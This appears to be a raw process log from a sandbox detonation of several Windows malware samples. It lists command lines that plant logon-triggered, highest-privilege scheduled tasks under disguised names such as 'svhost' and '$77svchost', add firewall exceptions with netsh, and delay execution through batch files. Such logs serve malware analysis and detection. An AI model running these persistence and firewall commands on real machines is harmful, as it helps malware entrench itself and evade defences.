\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5mY021yCVQh1.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KFbtkHMeAXJX.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vr1M2usLXRc.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe
"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUS2gPIhGtNN.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\Desktop\Files\svchost.exe
"C:\Users\Admin\Desktop\Files\svchost.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWxfLIywvcEI.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3D63.tmp.bat""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c02a2c241a324dd19c2b6e4c88626ac7 /t 5616 /p 5944
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe
C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkTqg95ZhAml.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\Desktop\Files\xxx.exe
"C:\Users\Admin\Desktop\Files\xxx.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pVhhKXcKhQS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YcMFuuFoZHsp.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\7777.exe
"C:\Users\Admin\Desktop\Files\7777.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xPlf2BI6iEkA.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8eC8nmLjGccv.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0MSPcy3lGfgs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GrTxXjz1jwCY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V9DRgIUMHXOY.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rVMlhZbJtSnx.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7136 -ip 7136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 484
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gpjwRu1uMfKS.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UlHU2iZsPmmk.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\networkmanager.exe
"C:\Users\Admin\Desktop\Files\networkmanager.exe"
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 248 -ip 248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 248 -s 456
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1S2mZNnufXOJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DAeqXvwV6Ud.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeiwQ7RofxNs.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7176 -ip 7176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 416
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsWPoyEdbx0v.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\Rage.exe
"C:\Users\Admin\Desktop\Files\Rage.exe"
C:\ProgramData\wvtynvwe\AutoIt3.exe
"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x
C:\Users\Admin\Desktop\Files\856.exe
"C:\Users\Admin\Desktop\Files\856.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe
"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"
C:\Users\Admin\Desktop\Files\ciscotest.exe
"C:\Users\Admin\Desktop\Files\ciscotest.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\svc1.exe
"C:\Users\Admin\Desktop\Files\svc1.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Desktop\Files\alexshlu.exe
"C:\Users\Admin\Desktop\Files\alexshlu.exe"
C:\Users\Admin\Desktop\Files\alexshlu.exe
"C:\Users\Admin\Desktop\Files\alexshlu.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HG73Nmet0qaJ.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\melt.txt
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe
"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tFMKq6EdJqBP.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Users\Admin\AppData\Roaming\$77Security.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\ProgramData\sommnx\bmxe.exe
C:\ProgramData\sommnx\bmxe.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe
C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
